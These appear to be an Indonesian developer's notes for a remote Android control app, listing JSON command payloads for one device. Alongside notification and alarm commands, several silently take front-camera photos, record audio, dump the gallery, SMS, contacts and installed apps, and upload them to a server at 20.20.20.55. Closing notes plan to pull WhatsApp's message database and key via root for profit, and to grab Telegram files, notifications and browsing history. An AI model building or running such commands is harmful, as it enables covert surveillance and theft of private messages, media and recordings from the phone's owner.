command
#Kirim Notifikasi
{
    "device_id": "98fbff301bd1c6ea",
    "command": "show_notification",
    "params": {
        "title": "Hai",
        "message": "Sudah waktunya istirahat"
    }
}
# take_foto 
{
    "device_id": "98fbff301bd1c6ea",
    "command": "take_photo",
    "params": {
        "camera": "front", // atau "back"
        "upload_url": "http://20.20.20.55:8080/api/device/upload_photo?device_id=98fbff301bd1c6ea"
    }
}

# show warning ui 
{
    "device_id": "98fbff301bd1c6ea",
    "command": "show_warning_ui",
    "params": {
        "message": "Sudah waktunya istirahat. Layar akan dikunci dalam 10 detik."
    }
}

get_installed_apps
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_installed_apps",
  "params": {}
}

upload_gallery
{
  "device_id": "98fbff301bd1c6ea",
  "command": "upload_gallery",
  "params": {}
}

get SMS
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_sms", ~> telegram=>100%, whatsapp ?
  "params": {}
}

msgstore.db whatsappkey -> root  > $$$$
get get_contact
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_contact",
  "params": {}
}

get_information
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_information",
  "params": {}
}

record_audio
{
  "device_id": "98fbff301bd1c6ea",
  "command": "record_audio",
  "params": {
    "duration": 10,
    "upload_url": "http://20.20.20.55:8080/api/device/upload_audio"
  }
}

play_alarm_now
{
  "device_id": "98fbff301bd1c6ea",
  "command": "play_alarm_now",
  "params": {
    "volume": 100,
    "duration": 10
  }
}

kirim link => baca ()
notifikasi aja di capture
file whatsapp, telegram,
riwayat browsing?